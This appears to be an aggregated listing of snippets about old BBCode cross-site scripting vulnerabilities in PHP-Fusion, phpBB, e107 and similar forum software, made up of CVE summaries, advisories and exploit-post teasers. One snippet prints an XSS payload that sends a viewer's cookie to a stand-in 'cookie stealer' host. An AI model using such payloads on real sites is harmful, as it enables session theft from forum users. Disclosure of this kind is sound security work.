CVE-2005-2783

CVE-2005-2783 is a cross-site scripting (XSS) vulnerability in PHP-Fusion versions up to 6.00.107 (and earlier). The issue arises from insufficient sanitization of nested, malformed URL BBCode tags, allowing remote attackers to inject arbitrary script/HTML when a user views a post containing the ...

CVE-2005-2783

Cross-site scripting XSS vulnerability in PHP-Fusion 6.00.107 and earlier allows remote attackers to inject arbitrary web script or HTML via nested, malformed URL BBCode tags...

flat256enENa2.txt

Flatnuke 2.5.6 enENa2 possibly prior versions user IP address / information disclosure software: site: http://flatnuke.sourceforge.net/flatnuke/ download link: http://itk.hopto.org:666/work/index.php?mod=Download&dlfile=FlatNukeEn/FlatNukeEn2.5.6a2.zip&mode=go same vuln of simple machine forum,...

PHP-Fusion <= v6.00.107 XSS exploit

Hello we haved found a vulnerability in PHP-Fusion =v6.00.107 which allows us to steal cookies. The exploit works because of badly coded bbcode. Well here is the exploit. URL=http://aaaaaa.com/URurl=aa.com&& OnMouseOver=jscript:location='http://direct/to/cookie/stealer.com/?c='+cookie;...

bbcodeLogout.txt

Hi, Saw this one on www.waraxe.us Discovered by Easyex and i was thinking if there are some more possibilities using the method described. The POC below is for phpBB. - ========== make yourself a folder on your host rename the folder to signature.jpg this will trick bbcode that its an image file...

[Full-disclosure] BBCode [IMG] [/IMG ] Tag Vulnerability

Hi, Saw this one on www.waraxe.us Discovered by Easyex and i was thinking if there are some more possibilities using the method described. The POC below is for phpBB. - ========== make yourself a folder on your host rename the folder to signature.jpg this will trick bbcode that its an image file...

PHP-Fusion 6.0.106 - BBCode IMG Tag Script Injection

PHP-Fusion 6.0.106 - BBCode IMG Tag Script Injection / ahh I was hoping for some socket code : /str0ke Dark Assassins - http://dark-assassins.com/ Visit us on IRC @ irc.tddirc.net DarkAssassins PHP-Fusion img/img exploit Discovered/Coded by Easyex Using the img /img codes we can get an...

CVE-2005-2438

Cross-site scripting XSS vulnerability in UseBB 0.5.1 and earlier allows remote attackers to inject arbitrary Javascript via the BBCode color value...

CVE-2005-2438

Cross-site scripting XSS vulnerability in UseBB 0.5.1 and earlier allows remote attackers to inject arbitrary Javascript via the BBCode color value...

CVE-2005-2401

PHP-Fusion is affected by CVE-2005-2401: remote attackers can inject arbitrary CSS through the BBCode color tag in posts. The related Nessus plugin and CVE records indicate this affects PHP-Fusion builds around the 6.0x line (e.g.,

[SA16149] phpBB BBcode "url" Script Insertion Vulnerability

---------------------------------------------------------------------- Bist Du interessiert an einem neuen Job in IT-Sicherheit? Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secuniavacancies/...

CVE-2005-2327

The CVE-2005-2327 entry describes a Cross-site scripting (XSS) vulnerability in the e107 content management system, affecting version 0.617 and earlier. The root cause is input handling that allows nested [url] BBCode tags to be processed in a way that enables remote injection of arbitrary script...

CVE-2005-2327

Cross-site scripting XSS vulnerability in e107 0.617 and earlier allows remote attackers to inject arbitrary web script or HTML via nested url BBCode tags...

CVE-2005-2327

Cross-site scripting XSS vulnerability in e107 0.617 and earlier allows remote attackers to inject arbitrary web script or HTML via nested url BBCode tags...

phpBB < 2.0.17 Nested BBCode URL Tags XSS

Binary data 3051.prm...

GLSA-200505-10 : phpBB: XSS Vulnerability

The remote host is affected by the vulnerability described in GLSA-200505-10 phpBB: XSS Vulnerability phpBB is vulnerable to a cross-site scripting vulnerability due to improper sanitization of user-supplied input. Coupled with poor validation of BBCode URLs which may be included in a forum post,...

CVE-2005-1193

The bbencodesecondpass and makeclickable functions in bbcode.php for phpBB before 2.0.15, as used in viewtopic.php, privmsg.php, and other scripts, allow remote attackers to execute arbitrary script via a BBcode tag with a 1 javascript:, 2 applet:, 3 about:, 4 activex:, 5 chrome:, or 6 script: UR...

CVE-2005-1193

The CVE-2005-1193 vulnerability affects phpBB up to version 2.0.14 (before 2.0.15). The bbencode_second_pass and make_clickable functions in bbcode.php fail to filter BBCode URLs, allowing remote attackers to execute arbitrary script via URL schemes such as javascript:, applet:, about:, activex:,...

phpBB: Cross-Site Scripting Vulnerability

Background phpBB is an Open Source bulletin board package. Description phpBB is vulnerable to a cross-site scripting vulnerability due to improper sanitization of user supplied input. Coupled with poor validation of BBCode URLs which may be included in a forum post, an unsuspecting user may follo...

CVE-2004-2038

Cross-site scripting XSS vulnerability in Land Down Under LDU before LDU 700 allows remote attackers to inject arbitrary web script or HTML via a BBcode img tag in 1 functions.php, 2 header.php or 3 auth.inc.php...